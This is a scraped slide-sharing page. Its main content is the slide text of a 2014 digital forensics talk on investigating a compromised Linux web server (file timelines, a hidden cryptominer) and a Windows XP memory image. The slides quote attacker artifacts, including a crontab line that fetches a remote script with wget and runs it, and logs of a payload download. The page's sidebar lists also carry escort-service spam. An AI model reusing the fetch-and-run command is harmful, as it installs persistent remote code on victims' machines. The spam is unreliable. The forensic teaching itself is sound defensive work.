Tomcat Maven PluginTomcat Maven Plugin
Tomcat Maven PluginOlivier Lamy
 
Mision y vision .pdf ss
Mision y vision .pdf ssMision y vision .pdf ss
Mision y vision .pdf ssRonnyonam
 
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...Quinnipiac University
 
State of virtualisation -- 2012
State of virtualisation -- 2012State of virtualisation -- 2012
State of virtualisation -- 2012Jonathan Sinclair
 
El papel del vídeo en la Web 2.0
El papel del vídeo en la Web 2.0El papel del vídeo en la Web 2.0
El papel del vídeo en la Web 2.0Pablo Olmeda
 
Django - the first five years
Django - the first five yearsDjango - the first five years
Django - the first five yearsJacob Kaplan-Moss
 

Andere mochten auch (17)

What's Next with Government Big Data
What's Next with Government Big Data What's Next with Government Big Data
What's Next with Government Big Data
 
Lacerte Helpful Resources
Lacerte Helpful ResourcesLacerte Helpful Resources
Lacerte Helpful Resources
 
Web service overview
Web service overviewWeb service overview
Web service overview
 
缓存技术浅谈
缓存技术浅谈缓存技术浅谈
缓存技术浅谈
 
AVG Community Powered Threat Report: Q1 2012
AVG Community Powered Threat Report: Q1 2012AVG Community Powered Threat Report: Q1 2012
AVG Community Powered Threat Report: Q1 2012
 
Social Networking
Social NetworkingSocial Networking
Social Networking
 
Montando seu DataCenter Pessoal - Fernando Massen
Montando seu DataCenter Pessoal - Fernando MassenMontando seu DataCenter Pessoal - Fernando Massen
Montando seu DataCenter Pessoal - Fernando Massen
 
Caderno SISP 2012
Caderno SISP 2012Caderno SISP 2012
Caderno SISP 2012
 
Especial Linux Magazine Software Público
Especial Linux Magazine Software PúblicoEspecial Linux Magazine Software Público
Especial Linux Magazine Software Público
 
SCWCD : The servlet model CHAP : 2
SCWCD : The servlet model CHAP : 2SCWCD : The servlet model CHAP : 2
SCWCD : The servlet model CHAP : 2
 
Tomcat Maven Plugin
Tomcat Maven PluginTomcat Maven Plugin
Tomcat Maven Plugin
 
Nosotros Elmedio
Nosotros ElmedioNosotros Elmedio
Nosotros Elmedio
 
Mision y vision .pdf ss
Mision y vision .pdf ssMision y vision .pdf ss
Mision y vision .pdf ss
 
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
 
State of virtualisation -- 2012
State of virtualisation -- 2012State of virtualisation -- 2012
State of virtualisation -- 2012
 
El papel del vídeo en la Web 2.0
El papel del vídeo en la Web 2.0El papel del vídeo en la Web 2.0
El papel del vídeo en la Web 2.0
 
Django - the first five years
Django - the first five yearsDjango - the first five years
Django - the first five years
 

Kürzlich hochgeladen

Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGSujit Pal
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 

Kürzlich hochgeladen (20)

Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 

Adventures in Digital Forensics

  • 2. xhr Easterhegg 2014 2 $ whoami
  • 3. xhr Easterhegg 2014 3 What is Digital Forensics?
  • 4. xhr Easterhegg 2014 4 What the media thinks...
  • 5. xhr Easterhegg 2014 5 + Flickr. West Midlands Police. CC-BY-2.0
  • 6. xhr Easterhegg 2014 6 What it is really about ...
  • 7. xhr Easterhegg 2014 7 Flickr. Naughty Architect. CC-BY-2.0
  • 8. xhr Easterhegg 2014 8 Srsly? Crawling a Shitload of Data * Hey, that's cool. It's Big Data[TM] !!1 *
  • 9. xhr Easterhegg 2014 9 Discover unknown malware * sadly, known as well :/ *
  • 10. xhr Easterhegg 2014 11 Learn new Things[TM]
  • 11. xhr Easterhegg 2014 12 Two Approaches
  • 12. xhr Easterhegg 2014 13 Disc Forensics
  • 13. xhr Easterhegg 2014 14 Memory Forensics
  • 14. xhr Easterhegg 2014 15 Post-mortem Analysis
  • 15. xhr Easterhegg 2014 16 MAC Time Analysis
  • 16. xhr Easterhegg 2014 17 Tim e stam pM AC User Perm issions Path Size Time Last Modified Last Accessed Last Changed Birth time
  • 17. xhr Easterhegg 2014 18 [...] m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkblocks" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/apache2" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkfs" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkswap" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/e.tar.xz" ..c.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/tar" .a..,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" ma..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/cpuminer­quark.zip" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zconf.h" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zlib.h" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/external­ip" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/upnpc" .a..,­rw­r—r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/lib/libminiupnpc.a" [...]
  • 18. xhr Easterhegg 2014 19 [...] m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkblocks" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/apache2" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkfs" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkswap" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/e.tar.xz" ..c.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/tar" .a..,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" ma..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/cpuminer­quark.zip" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zconf.h" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zlib.h" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/external­ip" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/upnpc" .a..,­rw­r—r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/lib/libminiupnpc.a" [...]
  • 19. xhr Easterhegg 2014 20 [...] .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m.c.,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" m...,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" mac.,­rw­r­­r­­,www­data,www­data,0,"/tmp/.a" ..c.,­rw­­­­­­­,www­data,www­data,0,"/var/www/.ssh/authorized_keys" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" ..c.,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" ..c.,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,­rw­r­­r­­,www­data,root,0,"/home/cron/www­data.tab" m.c.,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" .a..,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" [...]
  • 20. xhr Easterhegg 2014 21 [...] .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m.c.,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" m...,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" mac.,­rw­r­­r­­,www­data,www­data,0,"/tmp/.a" ..c.,­rw­­­­­­­,www­data,www­data,0,"/var/www/.ssh/authorized_keys" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" ..c.,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" ..c.,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,­rw­r­­r­­,www­data,root,0,"/home/cron/www­data.tab" m.c.,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" .a..,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" [...]
  • 21. xhr Easterhegg 2014 22 On-disk Analysis
  • 22. xhr Easterhegg 2014 23 host:/tmp/.ICE­unix/­log# ls ­l total 5088 ­rw­r­­r­­  1 www­data www­data     238 Dec 17 16:26   drwxr­xr­x  2 www­data www­data    4096 Dec 15 04:01 bin ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip.1 ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip.2 ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip.3 drwxr­xr­x  3 www­data www­data      22 Dec 14 12:41 doc drwxr­xr­x  5 www­data www­data     126 Dec 15 04:01 include drwxr­xr­x  4 www­data www­data    4096 Dec 17 16:26 lib drwxr­xr­x  3 www­data www­data      17 Dec 14 12:41 man ­rwxr­xr­x  1 www­data www­data       0 Dec 14 03:24 rsyslogd ­rw­r­­r­­  1 www­data www­data 3077358 Dec 16 16:53 sshc.tgz drwxr­xr­x  6 www­data www­data      71 Dec 15 03:53 ssl
  • 23. xhr Easterhegg 2014 24 Crontab FTW! @weekly wget ­q hxxp://221.132.37.XX/scen  ­O /tmp/sh; sh /tmp/sh; rm ­rd /tmp/sh
  • 24. xhr Easterhegg 2014 25 Log Files
  • 25. xhr Easterhegg 2014 26 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
  • 26. xhr Easterhegg 2014 27 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
  • 27. xhr Easterhegg 2014 28 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
  • 28. xhr Easterhegg 2014 29 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
  • 29. xhr Easterhegg 2014 30 Write Remote Logs!!1
  • 30. xhr Easterhegg 2014 31 And use Smart Indexing loghost:/syslog/live $ du -hs 4.5T . :)
  • 31. xhr Easterhegg 2014 32 Memory Forensics 101
  • 32. xhr Easterhegg 2014 33 Mem dump == IDDQD
  • 33. xhr Easterhegg 2014 34 Linux → Windows
  • 34. xhr Easterhegg 2014 35 Details about the Victim Determining profile based on KDBG search...           Suggested Profile(s) : WinXPSP2x86,  WinXPSP3x86 (Instantiated with WinXPSP2x86)                       PAE type : PAE                            DTB : 0x28a000L                           KDBG : 0x80545ce0           Number of Processors : 1      Image Type (Service Pack) : 3 $ file ram.elf  ram.elf: ELF 64­bit LSB core file x86­64,  version 1 (SYSV) $ ls ­l ram.elf  293M ­rw­­­­­­­ 1 xhr xhr 293M Apr 19 15:29  ram.elf
  • 35. xhr Easterhegg 2014 36 Check Networking
  • 36. xhr Easterhegg 2014 37 Offset(P)  Local Address             Remote Address            Pid ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­ 0x017af800 10.0.2.15:2859            4.26.224.125:80           360 0x017c3008 10.0.2.15:2841            4.26.224.125:80           360 0x017c3270 10.0.2.15:2845            68.232.35.169:80          360 0x017c42c0 10.0.2.15:2771            31.13.64.145:443          360 0x017c45d0 10.0.2.15:2770            23.37.37.163:80           360 0x017d2aa8 10.0.2.15:2857            4.26.224.125:80           360 0x017d75c0 10.0.2.15:2846            162.159.243.176:80        360 0x017d79e8 10.0.2.15:2773            2.18.162.110:443          360 0x017d7cf8 10.0.2.15:2772            95.100.249.129:80         360 0x017d8d28 10.0.2.15:2858            4.26.224.125:80           360 0x017db9e8 10.0.2.15:2778            131.253.37.30:80          360 0x017dbcf8 10.0.2.15:2867            8.21.198.146:80           360 0x017ddbe8 10.0.2.15:2769            23.37.37.163:80           360 0x017de6e8 10.0.2.15:2761            91.103.137.3:80           360 0x01803968 10.0.2.15:2754            23.43.118.238:80          360 0x01803e68 10.0.2.15:2757            173.194.69.139:80        3460 0x0195e458 10.0.2.15:2854            31.192.116.24:80          360
  • 37. xhr Easterhegg 2014 38 Offset(P)  Local Address             Remote Address            Pid ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­ 0x017af800 10.0.2.15:2859            4.26.224.125:80           360 0x017c3008 10.0.2.15:2841            4.26.224.125:80           360 0x017c3270 10.0.2.15:2845            68.232.35.169:80          360 0x017c42c0 10.0.2.15:2771            31.13.64.145:443          360 0x017c45d0 10.0.2.15:2770            23.37.37.163:80           360 0x017d2aa8 10.0.2.15:2857            4.26.224.125:80           360 0x017d75c0 10.0.2.15:2846            162.159.243.176:80        360 0x017d79e8 10.0.2.15:2773            2.18.162.110:443          360 0x017d7cf8 10.0.2.15:2772            95.100.249.129:80         360 0x017d8d28 10.0.2.15:2858            4.26.224.125:80           360 0x017db9e8 10.0.2.15:2778            131.253.37.30:80          360 0x017dbcf8 10.0.2.15:2867            8.21.198.146:80           360 0x017ddbe8 10.0.2.15:2769            23.37.37.163:80           360 0x017de6e8 10.0.2.15:2761            91.103.137.3:80           360 0x01803968 10.0.2.15:2754            23.43.118.238:80          360 0x01803e68 10.0.2.15:2757            173.194.69.139:80        3460 0x0195e458 10.0.2.15:2854            31.192.116.24:80          360
  • 38. xhr Easterhegg 2014 39 Check IE History
  • 39. xhr Easterhegg 2014 40 admin@about:Home admin@http://127.0.0.1:1088/app/index.html admin@http://ccc.de admin@http://ccc.de/de/rss/updates.rdf admin@http://ccc.de/de/rss/updates.xml admin@http://de.msn.com/?rd=1&ucc=DE&dcc=DE&opt=0 admin@http://edpn.ebay.com/engagement?INIT=575302488402|22076974|707189966101462|1|0| 1||http://de.msn.com/?rd=1&ucc=DE&dcc=DE&opt=0 admin@http://go.microsoft.com/fwlink/?LinkID=121792 admin@http://home.microsoft.com admin@https://download­installer.cdn.mozilla.net/pub/firefox/releases/26.0/win32/en­ US/Firefox%20Setup%20Stub%2026.0.exe admin@http://update.microsoft.com/favicon.ico admin@http://update.microsoft.com/microsoftupdate/v6/default.aspx admin@http://update.microsoft.com/microsoftupdate/v6/default.aspx?ln=en­us admin@http://update.microsoft.com/microsoftupdate/v6/resultslist.aspx?ln=en­us&id=6 admin@http://windowsupdate.microsoft.com/favicon.ico admin@http://windowsupdate.microsoft.com/windowsupdate/v6/default.aspx admin@http://windowsupdate.microsoft.com/windowsupdate/v6/default.aspx?ln=en­us admin@http://windowsupdate.microsoft.com/windowsupdate/v6/resultslist.aspx?ln=en­ us&id=6 admin@http://windowsupdate.microsoft.com/windowsupdate/v6/splash.aspx?ln=en­us&page=8 admin@http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome admin@http://www.mozilla.org/en­US admin@http://www.mozilla.org/en­US/products/download.html?product=firefox­ stub&os=win&lang=en­US admin@http://www.msn.com admin@http://www.youporn.com/rss admin@res://ief admin@res://ieframe.dll/tabswelcome.htm
  • 40. xhr Easterhegg 2014 42 Any Malicious Processes?
